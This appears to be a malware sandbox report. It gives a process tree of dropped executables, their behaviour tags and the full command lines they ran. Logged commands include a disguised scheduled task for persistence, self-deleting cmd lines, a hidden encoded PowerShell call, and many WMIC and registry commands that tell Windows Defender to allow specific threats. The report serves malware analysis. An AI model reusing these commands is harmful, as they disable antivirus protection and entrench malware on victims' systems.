                                                                                                                                                                                                                                                                                                                                                        PID:8560
                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe
                                                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe"
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                            PID:12440
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                              /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                              PID:13036
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\818D.exe"
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:12496
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                PID:10608
                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\B30E.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\B30E.exe
                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                              PID:4508
                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BAC0.exe
                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\BAC0.exe
                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                              PID:9624
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\BAC0.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\BAC0.exe
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:5256
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\C3F8.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\C3F8.exe
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                                                                                PID:9568
                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\E3F5.exe
                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\E3F5.exe
                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:6836
                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\E761.exe
                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\E761.exe
                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                    PID:9748
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\E761.exe
                                                                                                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\E761.exe"
                                                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:7716
                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\F491.exe
                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\F491.exe
                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                        PID:6192
                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D2B.exe
                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D2B.exe
                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                        • NTFS ADS
                                                                                                                                                                                                                                                                                                                                                                        PID:6584
                                                                                                                                                                                                                                                                                                                                                                        • C:\ProgramData\SQWM6AN8HIEEB4JT.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\ProgramData\SQWM6AN8HIEEB4JT.exe"
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                          • Drops startup file
                                                                                                                                                                                                                                                                                                                                                                          PID:9052
                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe
                                                                                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe"
                                                                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                                                                                                            PID:10936
                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im D2B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D2B.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:8188
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                                                              taskkill /im D2B.exe /f
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                                                                              PID:13008
                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                                                                                                                                                                                              timeout /t 6
                                                                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                                                                                                                                                                                              PID:18944
                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\3749.exe
                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\3749.exe
                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:11228
                                                                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s Browser
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                          PID:2684
                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                                            PID:5036
                                                                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s WpnService
                                                                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                                                                            PID:2628
                                                                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
                                                                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                                                                              PID:2344
                                                                                                                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                                              PID:2336
                                                                                                                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                                                                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                                                                PID:1956
                                                                                                                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                                                                  PID:1404
                                                                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                                                                    PID:1344
                                                                                                                                                                                                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                                                                                                                      PID:1216
                                                                                                                                                                                                                                                                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                                                        PID:1096
                                                                                                                                                                                                                                                                                                                                                                                      • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                          PID:2144
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\ctghugg
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                          PID:10444
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                                                          PID:10820
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\aeghugg
                                                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                                                                                                            PID:16396
                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                                                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                            PID:12952
                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                              PID:12692
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                                                                PID:17248
                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe
                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S
                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                              PID:19268
                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
                                                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                                                  PID:12124
                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                                                                                                      PID:6468
                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                        /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                          PID:12592
                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                            PID:7084
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:14268
                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                          forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                                                                                            PID:6404
                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                              /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                PID:2280
                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:17416
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:10512
                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                  PID:6552
                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                    /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                      PID:11444
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:17708
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8968
                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                                                                                                                                                                                                                                      forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
                                                                                                                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:10552
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                          /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                                                                                          PID:7528
                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                            powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:4124
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
                                                                                                                                                                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:15656
                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:9768
